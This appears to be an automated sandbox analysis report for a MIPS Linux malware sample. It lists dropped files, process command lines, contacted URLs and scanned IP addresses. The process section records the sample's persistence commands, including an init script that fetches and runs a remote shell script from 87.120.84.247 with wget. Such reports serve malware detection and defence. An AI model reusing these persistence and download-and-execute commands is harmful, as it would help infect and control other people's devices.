Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
mips.nn.elf
|
ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
|
initial sample
|
||
/etc/init.d/mips.nn.elf
|
POSIX shell script, ASCII text executable
|
dropped
|
||
/etc/init.d/mybinary
|
POSIX shell script, ASCII text executable
|
dropped
|
||
/etc/profile
|
ASCII text
|
dropped
|
||
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
||
/boot/bootcmd
|
ASCII text
|
dropped
|
||
/etc/inittab
|
ASCII text
|
dropped
|
||
/etc/motd
|
ASCII text
|
dropped
|
||
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
||
/tmp/qemu-open.jsRlWF (deleted)
|
ASCII text, with no line terminators
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
/usr/bin/dash
|
-
|
||
/usr/bin/rm
|
rm -f /tmp/tmp.tM56AMu5de /tmp/tmp.NEKDqhHxdl /tmp/tmp.Jndop9wNRb
|
||
/usr/bin/dash
|
-
|
||
/usr/bin/rm
|
rm -f /tmp/tmp.tM56AMu5de /tmp/tmp.NEKDqhHxdl /tmp/tmp.Jndop9wNRb
|
||
/tmp/mips.nn.elf
|
/tmp/mips.nn.elf
|
||
/tmp/mips.nn.elf
|
-
|
||
/tmp/mips.nn.elf
|
-
|
||
/bin/sh
|
sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
/tmp/mips.nn.elf
|
-
|
||
/bin/sh
|
sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/chmod
|
chmod +x /etc/init.d/mybinary
|
||
/tmp/mips.nn.elf
|
-
|
||
/bin/sh
|
sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/ln
|
ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
|
||
/tmp/mips.nn.elf
|
-
|
||
/bin/sh
|
sh -c "echo \"#!/bin/sh\n# /etc/init.d/mips.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mips.nn.elf'\n /tmp/mips.nn.elf
&\n wget http://87.120.84.247/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping
mips.nn.elf'\n killall mips.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0
{start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mips.nn.elf"
|
||
/tmp/mips.nn.elf
|
-
|
||
/bin/sh
|
sh -c "chmod +x /etc/init.d/mips.nn.elf >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/chmod
|
chmod +x /etc/init.d/mips.nn.elf
|
||
/tmp/mips.nn.elf
|
-
|
||
/bin/sh
|
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
/tmp/mips.nn.elf
|
-
|
||
/bin/sh
|
sh -c "ln -s /etc/init.d/mips.nn.elf /etc/rc.d/S99mips.nn.elf >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/ln
|
ln -s /etc/init.d/mips.nn.elf /etc/rc.d/S99mips.nn.elf
|
||
/tmp/mips.nn.elf
|
-
|
||
/tmp/mips.nn.elf
|
-
|
||
/tmp/mips.nn.elf
|
-
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/libexec/gnome-session-binary
|
-
|
||
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
/usr/lib/systemd/systemd
|
-
|
||
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://87.120.84.247/
|
unknown
|
||
http://87.120.84.247/curl.sh
|
unknown
|
||
http://87.120.84.247/lol.sh
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
210.111.34.57
|
unknown
|
Korea Republic of
|
||
95.203.118.162
|
unknown
|
Sweden
|
||
163.69.189.26
|
unknown
|
France
|
||
105.37.230.254
|
unknown
|
Egypt
|
||
159.35.197.217
|
unknown
|
United States
|
||
58.152.39.181
|
unknown
|
Hong Kong
|
||
78.99.186.229
|
unknown
|
Slovakia (SLOVAK Republic)
|
||
121.47.93.63
|
unknown
|
China
|
||
142.108.126.82
|
unknown
|
Canada
|
||
105.238.243.184
|
unknown
|
Sudan
|
||
191.207.145.221
|
unknown
|
Brazil
|
||
49.231.179.65
|
unknown
|
Thailand
|
||
40.84.79.233
|
unknown
|
United States
|
||
200.49.135.19
|
unknown
|
Argentina
|
||
156.85.149.133
|
unknown
|
United States
|
||
97.173.148.106
|
unknown
|
United States
|
||
120.253.183.126
|
unknown
|
China
|
||
201.213.173.29
|
unknown
|
Argentina
|
||
16.136.52.223
|
unknown
|
United States
|
||
8.59.22.93
|
unknown
|
United States
|
||
126.163.155.63
|
unknown
|
Japan
|
||
16.84.67.40
|
unknown
|
United States
|
||
61.85.56.98
|
unknown
|
Korea Republic of
|
||
124.220.251.253
|
unknown
|
China
|
||
78.0.46.255
|
unknown
|
Croatia (LOCAL Name: Hrvatska)
|
||
90.143.129.97
|
unknown
|
Sweden
|
||
177.45.204.149
|
unknown
|
Brazil
|
||
137.243.234.37
|
unknown
|
United States
|
||
27.16.176.17
|
unknown
|
China
|
||
134.198.73.200
|
unknown
|
United States
|
||
136.79.129.102
|
unknown
|
United States
|
||
20.167.137.74
|
unknown
|
United States
|
||
161.139.210.188
|
unknown
|
Malaysia
|
||
9.60.44.44
|
unknown
|
United States
|
||
139.74.142.43
|
unknown
|
Finland
|
||
116.11.222.147
|
unknown
|
China
|
||
91.128.10.233
|
unknown
|
Austria
|
||
13.186.30.255
|
unknown
|
United States
|
||
152.210.97.253
|
unknown
|
United States
|
||
91.177.82.239
|
unknown
|
Belgium
|
||
170.96.137.3
|
unknown
|
United States
|
||
198.4.188.102
|
unknown
|
United States
|
||
91.6.152.230
|
unknown
|
Germany
|
||
123.255.122.76
|
unknown
|
Hong Kong
|
||
129.122.145.241
|
unknown
|
Angola
|
||
83.70.56.66
|
unknown
|
Ireland
|
||
47.29.76.193
|
unknown
|
India
|
||
98.122.103.200
|
unknown
|
United States
|
||
221.148.160.192
|
unknown
|
Korea Republic of
|
||
100.9.112.197
|
unknown
|
United States
|
||
108.99.38.240
|
unknown
|
United States
|
||
112.112.252.59
|
unknown
|
China
|
||
123.103.188.180
|
unknown
|
Japan
|
||
104.39.255.2
|
unknown
|
United States
|
||
172.105.84.134
|
unknown
|
United States
|
||
171.142.5.213
|
unknown
|
United States
|
||
110.162.129.164
|
unknown
|
Japan
|
||
81.73.176.48
|
unknown
|
Italy
|
||
99.235.109.202
|
unknown
|
Canada
|
||
28.57.227.187
|
unknown
|
United States
|
||
78.211.17.129
|
unknown
|
France
|
||
218.250.225.7
|
unknown
|
Hong Kong
|
||
37.173.129.71
|
unknown
|
France
|
||
39.211.160.147
|
unknown
|
Indonesia
|
||
206.99.77.209
|
unknown
|
United States
|
||
23.20.35.241
|
unknown
|
United States
|
||
156.48.81.6
|
unknown
|
United Kingdom
|
||
32.51.118.139
|
unknown
|
United States
|
||
168.96.250.74
|
unknown
|
Argentina
|
||
161.35.223.150
|
unknown
|
United States
|
||
111.177.208.17
|
unknown
|
China
|
||
182.141.251.85
|
unknown
|
China
|
||
193.143.1.70
|
unknown
|
unknown
|
||
47.241.54.126
|
unknown
|
United States
|
||
76.144.56.62
|
unknown
|
United States
|
||
163.7.182.31
|
unknown
|
New Zealand
|
||
202.59.101.92
|
unknown
|
Australia
|
||
100.203.234.248
|
unknown
|
United States
|
||
206.86.233.213
|
unknown
|
United States
|
||
174.198.148.228
|
unknown
|
United States
|
||
102.230.206.207
|
unknown
|
unknown
|
||
37.49.84.151
|
unknown
|
Germany
|
||
170.38.80.177
|
unknown
|
Malaysia
|
||
170.232.108.131
|
unknown
|
United States
|
||
212.129.25.56
|
unknown
|
France
|
||
152.121.32.199
|
unknown
|
United States
|
||
5.236.26.249
|
unknown
|
Iran (ISLAMIC Republic Of)
|
||
149.210.209.177
|
unknown
|
Netherlands
|
||
68.229.115.27
|
unknown
|
United States
|
||
63.62.242.255
|
unknown
|
United States
|
||
74.162.122.5
|
unknown
|
United States
|
||
58.111.46.149
|
unknown
|
Australia
|
||
106.9.87.117
|
unknown
|
China
|
||
3.46.75.174
|
unknown
|
United States
|
||
70.183.32.6
|
unknown
|
United States
|
||
28.196.103.87
|
unknown
|
United States
|
||
104.247.124.255
|
unknown
|
Reserved
|
||
46.202.153.238
|
unknown
|
Ukraine
|
||
158.98.222.214
|
unknown
|
United States
|
||
20.240.176.192
|
unknown
|
United States
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
7fc31c420000
|
page execute read
|
|||
7fc31c420000
|
page execute read
|
|||
7fc3a3994000
|
page read and write
|
|||
55d9a7a85000
|
page read and write
|
|||
7fc3a333c000
|
page read and write
|
|||
7ffde15da000
|
page execute read
|
|||
7fc3a3319000
|
page read and write
|
|||
7fc3a3359000
|
page read and write
|
|||
7fc31c465000
|
page read and write
|
|||
7fc3a386b000
|
page read and write
|
|||
7fc3a39e1000
|
page read and write
|
|||
7fc3a2cc8000
|
page read and write
|
|||
7fc31c461000
|
page read and write
|
|||
7fc3a333c000
|
page read and write
|
|||
7fc39c000000
|
page read and write
|
|||
55d9a46cf000
|
page read and write
|
|||
55d9a66e4000
|
page read and write
|
|||
7fc39c021000
|
page read and write
|
|||
7fc31c465000
|
page read and write
|
|||
7fc3a2cba000
|
page read and write
|
|||
7fc31c461000
|
page read and write
|
|||
55d9a7a85000
|
page read and write
|
|||
7fc3a2f78000
|
page read and write
|
|||
7fc3a368a000
|
page read and write
|
|||
55d9a46c5000
|
page read and write
|
|||
7fc39c021000
|
page read and write
|
|||
55d9a66e4000
|
page read and write
|
|||
7fc3a399c000
|
page read and write
|
|||
55d9a46cf000
|
page read and write
|
|||
55d9a66cd000
|
page execute and read and write
|
|||
7ffde15d4000
|
page read and write
|
|||
7fc3a2cba000
|
page read and write
|
|||
55d9a46c5000
|
page read and write
|
|||
7fc3a24b2000
|
page read and write
|
|||
7fc3a39e1000
|
page read and write
|
|||
7fc3a3319000
|
page read and write
|
|||
7fc3a368a000
|
page read and write
|
|||
7ffde15da000
|
page execute read
|
|||
55d9a443d000
|
page execute read
|
|||
7fc3a399c000
|
page read and write
|
|||
7fc39c000000
|
page read and write
|
|||
7fc3a24b2000
|
page read and write
|
|||
7ffde15d4000
|
page read and write
|
|||
55d9a66cd000
|
page execute and read and write
|
|||
7fc3a386b000
|
page read and write
|
|||
7fc3a3359000
|
page read and write
|
|||
7fc3a2f78000
|
page read and write
|
|||
55d9a443d000
|
page execute read
|
|||
7fc3a2cc8000
|
page read and write
|
|||
7fc3a3994000
|
page read and write
|
|||
7fc31c46a000
|
page read and write
|